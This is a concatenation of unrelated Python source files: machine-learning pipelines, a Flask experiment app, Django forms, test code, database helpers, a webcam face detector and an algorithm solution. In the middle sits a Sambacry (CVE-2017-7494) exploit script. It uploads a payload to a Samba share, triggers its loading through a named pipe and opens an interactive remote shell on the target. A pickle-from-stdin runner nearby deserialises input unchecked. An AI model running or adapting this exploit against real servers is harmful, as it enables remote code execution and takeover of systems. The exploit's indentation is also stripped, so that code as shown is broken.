        hsi_tifs.append(x.result())
    except:
        pass
cpu_client.close()

# Predict per tile on a GPU cluster.
gpu_client = start(gpus=10, mem_size="50GB")
#No daemonic dask children
config["workers"] = 0
futures = []
for x in hsi_tifs:
    future = gpu_client.submit(predict.predict_tile, x, dead_model_path = dead_model_path, species_model_path=species_model_path, config=config)
    futures.append(future)
wait(futures)

# Gather per-tile predictions, logging (but surviving) failures.
predictions = []
for future in futures:
    try:
        trees = future.result()
        if not trees.empty:
            predictions.append(trees)
    except Exception as e:
        print(e)
        print(traceback.print_exc())

# Concatenate everything and write a single shapefile of predictions.
predictions = pd.concat(predictions)
predictions = gpd.GeoDataFrame(predictions, geometry="geometry")
predictions.to_file("results/OSBS_predictions.shp")
|
import cv2
import os
USERNAME = 'admin'
PASSWORD = 'admin'
IP = '192.168.1.107:8081'
PORT = '554'

# Force RTSP over UDP for OpenCV's FFmpeg capture backend.
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"

# BUGFIX: the URL was built as 'https//user:pass@ip/' — the scheme
# separator lacked its colon, and PORT was passed to format() with no
# matching placeholder. Given the RTSP transport option above and the
# CAP_FFMPEG backend, an rtsp:// URL is what the capture expects.
# (IP already carries its own port suffix, so PORT stays unused here.)
URL = 'rtsp://{}:{}@{}/'.format(USERNAME, PASSWORD, IP)
print('Conectado com: ' + URL)

cap = cv2.VideoCapture(URL, cv2.CAP_FFMPEG)

# Haar cascades shipped with OpenCV for face, eye and smile detection.
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
eyesCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye.xml')
smileCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml')

while True:
    _, frame = cap.read()
    # Cascades operate on grayscale images.
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = faceCascade.detectMultiScale(
        gray,
        scaleFactor = 1.1,
        minNeighbors = 5,
        minSize = (30, 30)
    )
    #Face detection (green boxes)
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
    #Eyes detection (blue boxes)
    eyes = eyesCascade.detectMultiScale(gray, 1.2, 18)
    for (x, y, w, h) in eyes:
        cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 2)
    #Smiles (red boxes)
    smiles = smileCascade.detectMultiScale(gray, 1.7, 20)
    for (x, y, w, h) in smiles:
        cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 0, 255), 2)
    cv2.imshow("video", frame)
    # Quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
from torch import nn as nn
from .resnet import conv3x3x3, conv1x1x1
class MyronenkoConvolutionBlock(nn.Module):
    """Pre-activation block: normalization (GroupNorm by default) -> ReLU ->
    3x3x3 convolution."""

    def __init__(self, in_planes, planes, stride=1, norm_layer=None, norm_groups=8, kernel_size=3):
        super(MyronenkoConvolutionBlock, self).__init__()
        self.norm_groups = norm_groups
        # Default to GroupNorm when no normalization layer is supplied.
        self.norm_layer = nn.GroupNorm if norm_layer is None else norm_layer
        self.norm1 = self.create_norm_layer(in_planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv = conv3x3x3(in_planes, planes, stride, kernel_size=kernel_size)

    def forward(self, x):
        return self.conv(self.relu(self.norm1(x)))

    def create_norm_layer(self, planes, error_on_non_divisible_norm_groups=False):
        """Instantiate the norm layer, degrading the group count gracefully.

        When planes is smaller than norm_groups, or not divisible by it (and
        errors are not requested), one group per plane is used instead.
        """
        if planes < self.norm_groups:
            return self.norm_layer(planes, planes)
        if not error_on_non_divisible_norm_groups and (planes % self.norm_groups) > 0:
            # Fall back to one norm group per plane, with a console notice.
            print("Setting number of norm groups to {} for this convolution block.".format(planes))
            return self.norm_layer(planes, planes)
        return self.norm_layer(self.norm_groups, planes)
class MyronenkoResidualBlock(nn.Module):
    """Two pre-activation convolution blocks with an additive skip connection."""

    def __init__(self, in_planes, planes, stride=1, norm_layer=None, norm_groups=8, kernel_size=3):
        super(MyronenkoResidualBlock, self).__init__()
        self.conv1 = MyronenkoConvolutionBlock(in_planes=in_planes, planes=planes, stride=stride,
                                               norm_layer=norm_layer, norm_groups=norm_groups,
                                               kernel_size=kernel_size)
        self.conv2 = MyronenkoConvolutionBlock(in_planes=planes, planes=planes, stride=stride,
                                               norm_layer=norm_layer, norm_groups=norm_groups,
                                               kernel_size=kernel_size)
        # Project the identity with a 1x1x1 conv when channel counts differ.
        self.sample = conv1x1x1(in_planes, planes) if in_planes != planes else None

    def forward(self, x):
        identity = x
        out = self.conv2(self.conv1(x))
        if self.sample is not None:
            identity = self.sample(identity)
        out += identity
        return out
class MyronenkoLayer(nn.Module):
    """A sequence of n_blocks blocks, with optional dropout applied once
    after the first block."""

    def __init__(self, n_blocks, block, in_planes, planes, *args, dropout=None, kernel_size=3, **kwargs):
        super(MyronenkoLayer, self).__init__()
        self.block = block
        self.n_blocks = n_blocks
        self.blocks = nn.ModuleList()
        for _ in range(n_blocks):
            self.blocks.append(block(in_planes, planes, *args, kernel_size=kernel_size, **kwargs))
            # Only the first block changes the channel count.
            in_planes = planes
        self.dropout = nn.Dropout3d(dropout, inplace=True) if dropout is not None else None

    def forward(self, x):
        for index, block in enumerate(self.blocks):
            x = block(x)
            # Dropout is applied only after the first block.
            if index == 0 and self.dropout is not None:
                x = self.dropout(x)
        return x
class MyronenkoEncoder(nn.Module):
    """Myronenko-style 3D CNN encoder: stacked residual layers with
    strided-convolution downsampling between consecutive layers."""

    def __init__(self, n_features, base_width=32, layer_blocks=None, layer=MyronenkoLayer, block=MyronenkoResidualBlock,
                 feature_dilation=2, downsampling_stride=2, dropout=0.2, layer_widths=None, kernel_size=3):
        super(MyronenkoEncoder, self).__init__()
        if layer_blocks is None:
            # Default depth profile: 1, 2, 2, 4 blocks per layer.
            layer_blocks = [1, 2, 2, 4]
        self.layers = nn.ModuleList()
        self.downsampling_convolutions = nn.ModuleList()
        in_width = n_features
        for i, n_blocks in enumerate(layer_blocks):
            if layer_widths is not None:
                # Explicit per-layer widths override the geometric schedule.
                out_width = layer_widths[i]
            else:
                # Width grows geometrically with depth.
                out_width = base_width * (feature_dilation ** i)
            if dropout and i == 0:
                # Dropout is used only in the first layer.
                layer_dropout = dropout
            else:
                layer_dropout = None
            self.layers.append(layer(n_blocks=n_blocks, block=block, in_planes=in_width, planes=out_width,
                                     dropout=layer_dropout, kernel_size=kernel_size))
            if i != len(layer_blocks) - 1:
                # Downsample between layers, but not after the last one.
                self.downsampling_convolutions.append(conv3x3x3(out_width, out_width, stride=downsampling_stride,
                                                                kernel_size=kernel_size))
            print("Encoder {}:".format(i), in_width, out_width)
            in_width = out_width

    def forward(self, x):
        """Run all layers, downsampling between consecutive layers."""
        for layer, downsampling in zip(self.layers[:-1], self.downsampling_convolutions):
            x = layer(x)
            x = downsampling(x)
        x = self.layers[-1](x)
        return x
|
import pandas as pd
import numpy as np
from flask import (
Blueprint,
render_template,
abort, request,
make_response,
url_for,
redirect
)
from flask_login import login_required, current_user
from flask_api import status
# Bokeh imports.
from bokeh.embed import components
from bokeh.plotting import figure, ColumnDataSource
from bokeh.models import HoverTool
from bokeh.resources import INLINE
from bokeh.util.string import encode_utf8
# Thor Server imports.
from ..models import Experiment, Observation
from ..utils import decode_recommendation
from .. import db
# Blueprint for experiment pages; Bokeh assets are rendered inline once at
# import time and reused by every request.
experiment = Blueprint("experiment", __name__)
js_resources = INLINE.render_js()
css_resources = INLINE.render_css()
@experiment.route(
    "/experiment/<int:experiment_id>/analysis/delete_pending/",
    methods=["POST"]
)
@login_required
def delete_pending(experiment_id):
    """Delete every pending observation of the current user's experiment,
    then redirect back to its analysis page (404 if not the owner)."""
    exp = Experiment.query.filter_by(
        id=experiment_id, user_id=current_user.id
    ).first_or_404()
    # Remove all observations still marked pending, in one transaction.
    for obs in exp.observations.filter(Observation.pending==True).all():
        db.session.delete(obs)
    db.session.commit()
    return redirect(url_for("experiment.analysis_page",
                            experiment_id=experiment_id))
@experiment.route("/experiment/<int:experiment_id>/history/download/")
@login_required
def download_history(experiment_id):
    """Export an experiment's observation history as a CSV attachment.

    Accessible to the owner, or to anyone when the experiment is published;
    otherwise responds 404.
    """
    # Query for the corresponding experiment (owned or published).
    experiment = Experiment.query.filter_by(id=experiment_id).filter(
        (Experiment.user_id==current_user.id) | (Experiment.is_published==True)
    ).first_or_404()
    # Parse the observations into a pandas dataframe, ordered by id.
    dims = experiment.dimensions.all()
    obs = experiment.observations.order_by("id").all()
    X, y = decode_recommendation(obs, dims)
    D = pd.DataFrame(X, columns=[d.name for d in dims])
    D["target"] = y
    D["obs_id"] = [o.id for o in obs]
    # BUGFIX: pd.datetime was deprecated and removed in modern pandas;
    # format the datetime objects directly instead.
    D["date"] = [o.date.strftime('%Y-%m-%d %H:%M:%S') for o in obs]
    D["description"] = [o.description or "" for o in obs]
    D.set_index('obs_id', inplace=True)
    # Serve the frame as a comma-separated-values attachment.
    resp = make_response(D.to_csv())
    resp.headers["Content-Disposition"] = "attachment; filename=export.csv"
    resp.headers["Content-Type"] = "text/csv"
    return resp
@experiment.route("/experiment/<int:experiment_id>/history/")
@login_required
def history_page(experiment_id):
    """Render the history tab for an owned or published experiment (404
    otherwise)."""
    experiment = Experiment.query.filter_by(id=experiment_id).filter(
        (Experiment.user_id==current_user.id) | (Experiment.is_published==True)
    ).first_or_404()
    return render_template(
        "experiment.jinja2",
        experiment=experiment,
        tab="history"
    )
@experiment.route("/experiment/<int:experiment_id>/analysis/")
@login_required
def analysis_page(experiment_id):
    """Render the analysis tab: a metric-vs-selected-variable scatter plot.

    Accessible to the owner or, for published experiments, any logged-in user.
    """
    # Query for the corresponding experiment.
    # NOTE(review): siblings use first_or_404(); here .first() plus the manual
    # abort(404) below serves the same purpose.
    experiment = Experiment.query.filter_by(id=experiment_id).filter(
        (Experiment.user_id==current_user.id) | (Experiment.is_published==True)
    ).first()
    # Grab the inputs arguments from the URL.
    args = request.args
    # Variable selector for analysis (index into the experiment's dimensions).
    selected_dim = int(args.get("variable", 0))
    if experiment:
        dims = experiment.dimensions.all()
        # A scatter needs at least two completed (non-pending) observations.
        if experiment.observations.filter_by(pending=False).count() > 1:
            obs = experiment.observations.filter_by(
                pending=False
            ).order_by("date").all()
            # Decode observations into design matrix X and objective vector y.
            X, y = decode_recommendation(obs, dims)
            sd = dims[selected_dim]
            # Construct tooltips on hover. Spaces are replaced with underscores
            # — presumably because Bokeh "@field" tooltip references cannot
            # contain spaces; confirm against Bokeh docs.
            D = {d.name.replace(" ", "_"): X[:, i] for i, d in enumerate(dims)}
            D["objective"] = y
            source = ColumnDataSource(data=D)
            hover = HoverTool(
                tooltips=[("Objective", "@objective")] +
                [(d.name, "@{}".format(d.name.replace(" ", "_"))) for d in dims],
                names=["evals"]
            )
            # Visualize; log-scale the x axis for logarithmic dimensions.
            fig = figure(
                title="Metric vs. Variable Scatter",
                tools=["pan", "box_zoom", "reset", hover],
                plot_height=225,
                sizing_mode='scale_width',
                x_axis_label="Variable",
                x_axis_type="log" if sd.dim_type == "logarithmic" else "linear"
            )
            fig.circle(sd.name.replace(" ", "_"), "objective", source=source, name="evals")
            fig.toolbar.logo = None
            script, div = components(fig)
        else:
            # Not enough data yet: render the page without a plot.
            script, div = "", ""
        # NOTE(review): encode_utf8 was removed in Bokeh 2.0 — confirm the
        # pinned bokeh version.
        return encode_utf8(
            render_template(
                "experiment.jinja2",
                tab="analysis",
                selected_dim=selected_dim,
                experiment=experiment,
                plot_script=script,
                plot_div=div,
                js_resources=js_resources,
                css_resources=css_resources,
            )
        )
    else:
        abort(404)
@experiment.route("/experiment/<int:experiment_id>/")
@login_required
def overview_page(experiment_id):
    """Render the overview tab with a cumulative-best improvement plot.

    Accessible to the owner or, for published experiments, any logged-in user.
    """
    # Query for the corresponding experiment.
    experiment = Experiment.query.filter_by(id=experiment_id).filter(
        (Experiment.user_id==current_user.id) | (Experiment.is_published==True)
    ).first_or_404()
    dims = experiment.dimensions.all()
    # A plot needs at least two completed (non-pending) observations.
    if experiment.observations.filter_by(pending=False).count() > 1:
        obs = experiment.observations.filter_by(
            pending=False
        ).order_by("date").all()
        # Decode the observations into a design matrix and a vector of targets.
        X, y = decode_recommendation(obs, dims)
        # Running best objective and 1-based iteration numbers.
        cummax = np.maximum.accumulate(y)
        r = np.arange(1, cummax.shape[0] + 1, step=1)
        # Construct tooltips on hover. Spaces become underscores — presumably
        # because Bokeh "@field" tooltip references cannot contain spaces.
        D = {d.name.replace(" ", "_"): X[:, i] for i, d in enumerate(dims)}
        D["objective"] = y
        D["r"] = r
        source = ColumnDataSource(data=D)
        hover = HoverTool(
            tooltips=[("Objective", "@objective")] + [(d.name, "@{}".format(d.name.replace(" ", "_"))) for d in dims],
            names=["evals"]
        )
        # Visualize the performance of the algorithm so far. This involves
        # showing a cumulative best line alongside dots indicating the
        # evaluation of the objective at each iteration. The plot is
        # accompanied by tools for panning, zooming, tooltips on hover, and
        # resetting the figure.
        fig = figure(
            title="Metric Improvement",
            tools=["pan", "box_zoom", "reset", hover],
            plot_height=225,
            sizing_mode='scale_width',
            x_axis_label="Number of Observations",
        )
        fig.line(r, cummax, line_width=2)
        fig.circle("r", "objective", source=source, name="evals")
        fig.toolbar.logo = None
        script, div = components(fig)
    else:
        # Not enough data yet: render the page without a plot.
        script, div = "", ""
    # NOTE(review): encode_utf8 was removed in Bokeh 2.0 — confirm version pin.
    return encode_utf8(
        render_template(
            "experiment.jinja2",
            tab="overview",
            experiment=experiment,
            plot_script=script,
            plot_div=div,
            js_resources=js_resources,
            css_resources=css_resources,
        )
    )
@experiment.route("/experiment/<int:experiment_id>/admin/")
@login_required
def admin_page(experiment_id):
    """Render the admin tab; restricted to the experiment's owner."""
    owned = Experiment.query.filter_by(
        id=experiment_id, user_id=current_user.id
    ).first_or_404()
    return render_template("experiment.jinja2", tab="admin", experiment=owned)
@experiment.errorhandler(404)
def page_not_found(e):
    """Render the blueprint's friendly 404 page."""
    body = render_template("404.jinja2")
    return body, status.HTTP_404_NOT_FOUND
|
# coding: utf-8
"""The django_nose module."""
from __future__ import unicode_literals
# Package version, exposed both as a tuple and as a dotted string.
VERSION = (1, 4, 1)
__version__ = '.'.join(map(str, VERSION))
from django_nose.runner import BasicNoseRunner, NoseTestSuiteRunner
from django_nose.testcases import FastFixtureTestCase
# Re-export sanity checks: fail fast at import time if the names go missing.
assert BasicNoseRunner
assert FastFixtureTestCase
# Django < 1.2 compatibility.
run_tests = run_gis_tests = NoseTestSuiteRunner
|
import pytest
import fairing
import sys
import io
import tempfile
import random
import os
from google.cloud import storage
from fairing import TrainJob
from fairing.backends import KubernetesBackend, KubeflowBackend
from fairing.backends import KubeflowGKEBackend, GKEBackend, GCPManagedBackend
# Project/bucket/registry names derived from the active GCP project.
GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
TEST_GCS_BUCKET = '{}-fairing'.format(GCS_PROJECT_ID)
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
# Markers printed by the training function; the tests assert on these strings.
GCS_SUCCESS_MSG = "gcs access is successful"
GCS_FAILED_MSG = 'google.api_core.exceptions.Forbidden: 403'
# Training function exercising GCS access from inside the training container.
def train_fn_with_gcs_access(temp_gcs_prefix):
    """Write a random string to GCS, read it back, and print the outcome."""
    suffix = random.randint(0, 10**9)
    blob_name = '{}/gcs_test_file_{}.txt'.format(temp_gcs_prefix, suffix)
    client = storage.Client()
    bucket = client.get_bucket('{}-fairing'.format(client.project))
    # Upload a fresh random payload, then read it back and compare.
    payload = str(random.randint(0, 10**9))
    bucket.blob(blob_name).upload_from_string(payload)
    roundtrip = bucket.blob(blob_name).download_as_string().decode("utf-8")
    if roundtrip == payload:
        print(GCS_SUCCESS_MSG)
    else:
        print("gcs content mismatch, expected:'{}' got: '{}'".format(payload, roundtrip))
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn_with_gcs_access.__module__ = '__main__'
def run_submission_with_gcs_access(deployer, pod_spec_mutators, namespace, gcs_prefix, capsys, expected_result):
    """Build, deploy and run the GCS training function, then assert on output.

    :param deployer: fairing deployer name (e.g. 'job', 'tfjob')
    :param pod_spec_mutators: mutators applied to the pod spec (e.g. credential mounts)
    :param namespace: Kubernetes namespace to deploy into
    :param gcs_prefix: GCS object prefix for the test file
    :param capsys: pytest capture fixture used to read the run's stdout
    :param expected_result: substring expected in the captured output
    """
    # Base the container image on the locally running Python version.
    py_version = ".".join([str(x) for x in sys.version_info[0:3]])
    base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
    fairing.config.set_builder(
        'docker', base_image=base_image,
        registry=DOCKER_REGISTRY, push=True)
    fairing.config.set_deployer(
        deployer, pod_spec_mutators=pod_spec_mutators, namespace=namespace)
    requirements_file = os.path.relpath(os.path.join(os.path.dirname(__file__), 'requirements.txt'))
    fairing.config.set_preprocessor('function',
                                    function_obj=lambda : train_fn_with_gcs_access(gcs_prefix),
                                    output_map={requirements_file: '/app/requirements.txt'})
    fairing.config.run()
    captured = capsys.readouterr()
    assert expected_result in captured.out
def test_job_submission_with_gcs_access(capsys, temp_gcs_prefix):
    """Job deployer with GCP credentials mounted should reach GCS."""
    run_submission_with_gcs_access(
        'job',
        pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
        namespace='kubeflow',
        gcs_prefix=temp_gcs_prefix,
        capsys=capsys,
        expected_result=GCS_SUCCESS_MSG)
def test_tfjob_submission_with_gcs_access(capsys, temp_gcs_prefix):
    """TFJob deployer with GCP credentials mounted should reach GCS."""
    run_submission_with_gcs_access(
        'tfjob',
        pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
        namespace='kubeflow',
        gcs_prefix=temp_gcs_prefix,
        capsys=capsys,
        expected_result=GCS_SUCCESS_MSG)
def test_job_submission_without_gcs_access(capsys, temp_gcs_prefix):
    """Without credential mutators the job should be denied (403)."""
    run_submission_with_gcs_access(
        'job',
        pod_spec_mutators=[],
        namespace='kubeflow',
        gcs_prefix=temp_gcs_prefix,
        capsys=capsys,
        expected_result=GCS_FAILED_MSG)
def test_tfjob_submission_without_gcs_access(capsys, temp_gcs_prefix):
    """Without credential mutators the TFJob should be denied (403)."""
    run_submission_with_gcs_access(
        'tfjob',
        pod_spec_mutators=[],
        namespace='kubeflow',
        gcs_prefix=temp_gcs_prefix,
        capsys=capsys,
        expected_result=GCS_FAILED_MSG)
def test_job_submission_invalid_namespace(capsys, temp_gcs_prefix):
    """Mounting credentials in a namespace without the secret must fail."""
    with pytest.raises(ValueError) as err:
        run_submission_with_gcs_access(
            'job',
            pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
            namespace='default',
            gcs_prefix=temp_gcs_prefix,
            capsys=capsys,
            expected_result=None)
    msg = 'Unable to mount credentials: '\
          'Secret user-gcp-sa not found in namespace default'
    assert msg in str(err.value)
def test_tfjob_submission_invalid_namespace(capsys, temp_gcs_prefix):
    """Same as above for the TFJob deployer."""
    with pytest.raises(ValueError) as err:
        run_submission_with_gcs_access(
            'tfjob',
            pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
            namespace='default',
            gcs_prefix=temp_gcs_prefix,
            capsys=capsys,
            expected_result=None)
    msg = 'Unable to mount credentials: '\
          'Secret user-gcp-sa not found in namespace default'
    assert msg in str(err.value)
|
# Sample module-level data used when the module is run directly.
txt = "Quick brown fox"
mlist = [1, 2, 3, 9]
# TODO move add to my utilities module
def add(a, b):
    """Return the sum of *a* and *b*, logging the operands first."""
    print(f"adding {a=} and {b=}")
    total = a + b
    return total
# best to keep Classes in separate module
# big class could have its own file with name such as klase.py
class Klase:
    # Placeholder class with no behavior yet.
    pass
class Garage:
    # Tiny demo class: stores a display name and announces construction.
    def __init__(self, gname="La biblioteca"):
        self.gname = gname
        print(f"Garage initialized! {self.gname=}")
# NOTE: any uncommented top-level statement would also run on import, e.g.:
# print("Running my_mod")
# The block below only runs when the module is executed directly.
if __name__ == "__main__":
    # typically you would put quick smoke tests here
    assert(add(2, 3) == 5)
    print("This will run when my_mod.py is called normally")
    my_gar = Garage()
|
'''
Created on Aug 27, 2017
@author: arnon

Reads a pickled RemoteWorker object from stdin and executes it.
'''
import pickle
import sys
# need to import objects that would be passed with in
from concepts.sshtypes import RemoteWorker
# SECURITY NOTE(review): pickle.loads executes arbitrary code embedded in the
# payload. This script must only ever receive data from a trusted channel
# (presumably the controlling SSH parent process — confirm).
workload = sys.stdin.buffer.read()
worker = pickle.loads(workload)
worker.run()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Sambacry (CVE-2017-7494) exploit by opsxcq
github.com/opsxcq
twitter.com/opsxcq
Tested on samba 5.4.9
If you don't have a samba server, use the vulnerables/cve-2017-7494 docker image to test it
"""
from sys import argv, exit
from argparse import ArgumentParser
import os
from impacket.dcerpc.v5 import samr, transport, srvs
from impacket.dcerpc.v5.dtypes import NULL
from impacket.smbconnection import *
import sys
import time
import socket
from threading import Thread
def dceTrigger(dce):
try:
dce.connect()
except SessionError as error:
print("[+] Expected exception from Samba (SMB SessionError)")
def receiveAndPrint(sock):
try:
while True:
data = sock.recv(8)
if not data:
break
sys.stdout.write(str(data))
except Exception, e:
print("[-] Exception "+str(e))
def exploit(target, port, executable, remoteshare, remotepath, user=None, password=None, remoteShellPort=None):
"""Samba exploit"""
# Open the connection
smbClient = SMBConnection(target, target, sess_port=port)
if user:
if not smbClient.login(user,password):
raise Exception("Authentication error, invalid user or password")
else:
print("[+] Authentication ok, we are in !")
# Upload the payload module
print("[+] Preparing the exploit")
executableName = os.path.basename(executable)
executableFile = open(executable, 'rb')
smbClient.putFile(remoteshare, executableName, executableFile.read)
executableFile.close()
# Trigger the bug in another thread, since it will be locked
triggerModule = r'ncacn_np:%s[\pipe\%s]' % (target, remotepath)
rpcTransport = transport.DCERPCTransportFactory(triggerModule)
dce = rpcTransport.get_dce_rpc()
triggerThread = Thread(target=dceTrigger, args=(dce,))
triggerThread.daemon = True
triggerThread.start()
# Give some time to the exploit to run
time.sleep(2)
# Profit
if not remoteShellPort:
print("[+] Target exploited, check it")
return
remoteShellPort = int(remoteShellPort)
print("[+] Exploit trigger running in background, checking our shell")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("[+] Connecting to %s at %s" % (target, str(remoteShellPort)))
sock.connect((target, remoteShellPort))
print("[+] Veryfying your shell...")
command="uname -a"
# Receive and print data in another thread
receiveThread = Thread(target=receiveAndPrint, args=(sock,))
receiveThread.daemon = True
receiveThread.start()
while True :
sock.send(command)
sock.send("\n")
command = raw_input(">>")
socket.close()
except Exception, e:
print("[-] IO error error connecting to the shell port "+str(e))
# Cleanup
if __name__ == "__main__":
ap = ArgumentParser(description="Sambacry (CVE-2017-7494) exploit by opsxcq")
ap.add_argument("-t", "--target", required=True, help="Target's hostname")
ap.add_argument("-e", "--executable", required=True, help="Executable/Payload file to use")
ap.add_argument("-s", "--remoteshare", required=True, help="Executable/Payload shared folder to use")
ap.add_argument("-r", "--remotepath", required=True, help="Executable/Payload path on remote file system")
ap.add_argument("-u", "--user", required=False, help="Samba username (optional")
ap.add_argument("-p", "--password", required=False, help="Samba password (optional)")
# Remote shell
ap.add_argument("-P", "--remoteshellport", required=False, help="Connect to a shell running in the remote host after exploitation")
args = vars(ap.parse_args())
# TODO : Add domain name as an argument
port = 445 # TODO : Add as an argument
try:
print("[*] Starting the exploit")
exploit(args["target"], port, args["executable"], args["remoteshare"],args["remotepath"], args["user"], args["password"], args["remoteshellport"])
except IOError:
exit("[!] Error")
except KeyboardInterrupt:
print("\n[*] Aborting the attack")
|
"""一些 MySQL 数据库操作。
create: 2018-12-12
modified:
"""
import pymysql
from .types import *
def insert_data(mysql_config: MysqlConfig, sql: str, item: Dict) -> int:
    """Insert one row and return the auto-generated row id.

    :param mysql_config: connection settings (host/port/user/pwd/db)
    :param sql: parameterized INSERT statement
    :param item: parameters bound into ``sql``
    :return: ``lastrowid`` of the inserted row
    """
    mysql_conn = pymysql.connect(
        host=mysql_config['host'], port=mysql_config['port'],
        user=mysql_config['user'], password=mysql_config['pwd'],
        db=mysql_config['db'], autocommit=True
    )
    try:
        with mysql_conn.cursor() as cursor:
            cursor.execute(sql, item)
            # Read lastrowid while the cursor is still open; relying on the
            # attribute after close() is fragile. Also guarantees the
            # connection is closed even if execute() raises.
            last_id = cursor.lastrowid
    finally:
        mysql_conn.close()
    return last_id
def read_data(mysql_config: MysqlConfig, sql: str) -> List[Tuple]:
    """Run a query and return all result rows.

    Fix: the original called ``fetchall()`` *after* closing the cursor and
    connection, which only works by accident with buffered cursors; rows are
    now fetched before anything is closed, and cleanup is guaranteed.
    """
    mysql_conn = pymysql.connect(
        host=mysql_config['host'], port=mysql_config['port'],
        user=mysql_config['user'], password=mysql_config['pwd'],
        db=mysql_config['db']
    )
    try:
        with mysql_conn.cursor() as cursor:
            cursor.execute(sql)
            rows = cursor.fetchall()
    finally:
        mysql_conn.close()
    return rows
def truncate_table(mysql_config: MysqlConfig, table: str) -> None:
    """Empty the given table.

    SECURITY NOTE(review): identifiers cannot be bound as query parameters,
    so the table name is interpolated into the SQL string. ``table`` must
    come from trusted code, never from user input.
    """
    mysql_conn = pymysql.connect(
        host=mysql_config['host'], port=mysql_config['port'],
        user=mysql_config['user'], password=mysql_config['pwd'],
        db=mysql_config['db']
    )
    try:
        with mysql_conn.cursor() as cursor:
            cursor.execute(f'TRUNCATE TABLE {table}')
    finally:
        mysql_conn.close()
|
import sys
class UnionFind:
    """Disjoint-set forest with union by rank, path compression and set sizes."""

    def __init__(self, n):
        # Indices 0..n are all valid; every element starts as its own root.
        self.root = list(range(n + 1))
        self.rank = [0] * (n + 1)
        self.size = [1] * (n + 1)

    def find(self, x):
        """Return the representative of x, compressing the path on the way."""
        path = []
        while self.root[x] != x:
            path.append(x)
            x = self.root[x]
        for node in path:
            self.root[node] = x
        return x

    def unite(self, x, y):
        """Merge the sets containing x and y (no-op if already joined)."""
        if self.is_same(x, y):
            return
        rx, ry = self.find(x), self.find(y)
        if self.rank[rx] < self.rank[ry]:
            # Always attach the shallower tree below the deeper one.
            rx, ry = ry, rx
        self.root[ry] = rx
        self.size[rx] += self.size[ry]
        if self.rank[rx] == self.rank[ry]:
            self.rank[rx] += 1

    def is_same(self, x, y):
        """Return True when x and y share a representative."""
        return self.find(x) == self.find(y)
def main():
    """Answer queries offline: for each (v, w), report the size of v's
    component in the graph formed only by roads whose year exceeds w."""
    input = sys.stdin.readline
    N, M = map(int, input().split())
    road = []
    for _ in range(M):
        a, b, y = map(int, input().split())
        # Store (year, 0-based endpoints).
        road.append((y, a-1, b-1))
    road = sorted(road, key=lambda x: x[0])
    Q = int(input())
    question = []
    for i in range(Q):
        v, w = map(int, input().split())
        # Keep the original index so answers can be emitted in input order.
        question.append((i, v-1, w))
    # Process queries with the largest threshold w first: as w decreases,
    # more roads satisfy year > w, so unions only ever accumulate.
    question = sorted(question, key=lambda x: -x[2])
    ans = [0 for _ in range(Q)]
    r = UnionFind(N)
    for i, v, w in question:
        # Merge every remaining road whose year is strictly greater than w.
        while len(road) > 0 and road[-1][0] > w:
            _, a, b = road.pop()
            r.unite(a, b)
        ans[i] = r.size[r.find(v)]
    print(*ans, sep='\n')
if __name__ == '__main__':
    main()
|
from __future__ import unicode_literals
from django import forms
from django.forms.widgets import SelectDateWidget
import calendar, datetime
from django.utils import timezone
from .models import *
# (value, label) choice tuples shared by the forms below.
TYPE = (('parent', 'Parent'), ('estate', 'Estate'),)
TERMS = (('first', 'First'), ('second', 'Second'), ('third', 'Third'),)
def getYears():
    """Return selectable years: 2015 through two years past the current year."""
    first_year = 2015
    last_year = datetime.datetime.now().year + 2
    return tuple(range(first_year, last_year + 1))
# Frozen at import time; shared by the date/year form fields below.
SELECTYEARS = getYears()
# Lazy "initial" callables for form fields (evaluated per request by Django).
def getCurrentYear():
    return timezone.now().year
def getCurrentMonth():
    return timezone.now().month
def getCurrentDay():
    return timezone.now().day
def getPupils():
    """Build (value, label) choices from all pupils, ordered by parent."""
    pupils = Pupil.objects.all().order_by('parent')
    pups = []
    for pupil in pupils:
        pups.append((str(pupil), pupil))
    pupils = tuple(pups)
    return pupils
# NOTE(review): evaluated at import time — the choice list is frozen until the
# process restarts and the database must be reachable during import.
PUPILS = getPupils()
def getParents():
    """Build (value, label) choices from all parents, ordered by name."""
    parents = Parent.objects.all().order_by('pname')
    pars = []
    for parent in parents:
        pars.append((str(parent), parent))
    parents = tuple(pars)
    return parents
# NOTE(review): import-time DB query — same caveat as PUPILS above.
PARENTS = getParents()
# --- Simple ModelForms, each exposing a fixed subset of model fields. ---
class TermForm(forms.ModelForm):
    class Meta:
        model = Term
        fields = ('term', 'year')
class ParentForm(forms.ModelForm):
    class Meta:
        model = Parent
        fields = ('pname', 'phone')
class RateForm(forms.ModelForm):
    class Meta:
        model = Rate
        fields = ('zone', 'rate', 'term')
class ZoneForm(forms.ModelForm):
    class Meta:
        model = Zone
        fields = ('zone',)
# class ClassForm(forms.ModelForm):
#	class Meta:
#		model = Class
#		fields = ('cls',)
class EstateForm(forms.ModelForm):
    class Meta:
        model = Estate
        fields = ('estate', 'zone')
class PupilForm(forms.ModelForm):
    class Meta:
        model = Pupil
        fields = ('fname', 'sname', 'parent')
class EstatePupilForm(forms.ModelForm):
    class Meta:
        model = EstatePupil
        fields = ('pupil', 'estate')
class TermPupilForm(forms.ModelForm):
    class Meta:
        model = TermPupil
